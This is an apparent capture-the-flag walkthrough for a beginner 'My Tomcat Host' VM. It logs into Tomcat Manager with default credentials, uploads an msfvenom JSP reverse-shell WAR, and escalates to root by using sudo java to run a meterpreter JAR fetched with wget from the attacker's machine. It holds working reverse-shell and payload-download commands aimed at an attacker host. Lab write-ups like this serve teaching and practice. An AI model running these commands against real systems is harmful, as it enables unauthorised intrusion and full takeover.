Welcome to “My Tomcat Host”. This boot to root VM is designed for testing your basic enumeration skills and concepts.
Difficulty: Easy/Beginner Level
Author: Akanksha Sachin Verma
Firstly, a netdiscover scan will reveal how the machine can be identified on the network:
netdiscover -i eth1 some more code for example
Then an nmap scan:
nmap -p- -A 192.168.56.110
A closer look at port 8080 on my browser reveals an Apache Tomcat/9.0.31
Apache Tomcat is an application server designed to execute Java servlets and render web pages that use Java Server page coding.
The “Manager App” section requires a username and password. The default credentials for Tomcat work (tomcat:tomcat).
The Web Application Manager is an opportunity to upload a reverse shell. I’ll be using msfvenom to create a reverse shell. This is a good website on how to use msfvenom for reference:
The payload must be a war file, listening on port 4444 with my local address.
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f war > fedai.war
This will be uploaded here:
Before executing the payload, listen on port 4444 with netcat:
nc -nvlp 4444
Now it must be executed, so we visit the path where it is kept, in my case /fedai. We now have a reverse shell. Uid is ‘tomcat’.
id python -c 'import pty;pty.spawn("/bin/bash")'
Always check sudo privileges to see how we can start escalating privileges:
As demonstrated, the user tomcat can run commands here: /usr/lib/jvm/java-1.8.0-openjdk-188.8.131.52.b08-0.el7_7.x86_64/jre/bin/java. This is an openjdk java binary file which we can use to exploit priviliges.
We’ll be creating another reverse shell payload on meterpreter in a java file format. Listening port will be 5555 with my local IP address again. The file will be downloaded on the victims pc so this file will be created under the apache web directory on my machine.
msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp lhost=192.168.56.101 lport=5555 > fedai.jar
Start the apache2 service:
service apache2 start
Go to the temp directory on the victim’s machine and transfer the payload over.
cd /tmp wget http://192.168.56.101/fedai.jar
Before executing, we need to set up the meterpreter payload listener on metasploit:
msfconsole use exploit/multi/handler set payload java/meterpreter/reverse_tcp set lport 5555 run
Let’s execute this payload with the following command:
sudo java -jar fedai.jar
We get a successful connection from the tomcat machine as seen on meterpreter, the current user has been identified as root!